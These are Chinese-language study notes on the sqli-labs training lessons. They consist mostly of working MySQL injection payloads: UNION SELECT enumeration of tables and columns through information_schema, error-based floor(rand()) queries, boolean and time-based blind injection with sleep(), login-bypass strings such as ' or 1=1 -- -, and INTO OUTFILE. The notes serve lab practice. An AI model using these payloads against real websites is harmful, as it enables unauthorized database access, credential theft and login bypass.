Sqli labs学习笔记
Lesson01:
字符型注入
地址栏加上 ?id=5' and '1'='1 测试通过
地址栏加上 ?id=5' (此处可加上恶意sql语句)--+ 测试通过(注释的方法)
Lesson02:
数字型注入
id=5-2 返回和 id=3一样的结果,说明是数字型的注入
id=2 (此处可加上恶意sql语句) --+
PS: 有的sql查询语句会在后边加上limit(0,1),只返回第一条有效的查询结果,在这里我们可以通过设置前一个正常的id的值无效,来使得最终结果来返回我们构造的语句的返回值。
Lesson03:
id=5 and 1=1
id=5 and 1=2 没有什么变化
id=3'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
说明原来的sql的语句中有 ) , 闭合的方法是再添加一个)
利用: 1. id=1') and ('1'='1
2. id=1') sql语句 --+
Lesson04:
基于双引号的字符型查询,和lesson03差不多
1.order by 查询字段数
2. database() 查询当前数据库名字
3.user() 当前用户
4. information_schema.tables 存放所有的表名 (mysql)
5.union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 4,1 --+
这个是查询数据库里边有哪些表,使用limit语句来显示返回第几个查询结果
6. union select 1,column_name,3 from information_schema.columns where table_name='users' limit 2,1 --+ 查询users表中,各个列的名字(字段名)
7.union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema="security" --+
也可以这样,使用group_concat(column_name)来返回所有的字段名
Lesson05&06:
基于错误的注入:
and ( select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b)--+
rand() 获取0-1之间的一个浮点随机数
floor() 取地板操作
group by 根据...分组
concat() 字符串连接
count() 计数函数
1.
(select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))a
这个表示给查询结果(select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))
取一个别名a
2.
(select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b
这个表示给查询结果(select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)取一个别名b
3.
and ( select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
这一句就可以查询出数据表的名字....
lesson07:
select * from Table into outfile '/路径/文件名'
Lesson08:
基于bool的盲注:
substr(String , int x, int y) 把字符串从x到y截取下来
ascii( char ) 返回assic码值
Lesson09&10:
基于时间的盲注: 根据一些时间函数,来自控制结果的返回时间,以此来判断自己的推断是不是正确的,由于web界面的返回值始终是true,只能通过时间差来判断。
sleep(n) 进程挂起n秒
if(1,2,3) 如果1则2,否则3
and (select if(assic(substr(database(),1,1)) , sleep(5),NULL) ) --+
Lesson11&12:
get post 注入
常用的"万能密码": ' or 1=1 -- -
') or 1=1
'or'='or'
登录: ' or 1=1 limit 0,1 # 密码随便输入就行
但是使用 --+ 来注释的时候不知道为啥 密码必须是 ' or 1=1
lesson12 就是 ("input") 这种类型的
Lesson13&14:
基于错误的注入:
lesson13 ') 注入语句#
mysql常见的系统函数及变量:
user() 用户名 session_user() 连接数据库的用户名 database()数据库名 vsersion()版本
curren_user 当前用户名 @@hostname主机名 @@port 端口 @@datadir 数据库路径
@@basedir 安装路径 @@vsersion_compile_os 操作系统
Lesson15:
1' or 盲注
Lesson16:
盲注(时间)
1") or sleep(1)
1") or sleep(1)=0 (因为sleep函数的返回值是0)使用or的时候要注意
1.
select username,password from tables where id='input' limit 0,1
' and 1=1 --+
2.
select username,password from tables where id=input limit 0,1
3.
select username,password from tables where id=('input') limit 0,1
4.
select username,password from tables where id=("input") limit 0,1
5.
?id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b )--+
6.
1" --+
9.
?id=2' and sleep(5)--+
10.
?id=2" and sleep(5)--+
?id=2" and if(database()='security',sleep(5),NULL)--+
11.
uname=ain' union select 1,database() -- -&passwd=admin&submit=Submit
13.
输入的类型是('input')
uname=') and (select 1 from (select count(*),concat(0x3a,0x3a,((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b ) -- -&passwd=admin&submit=Submit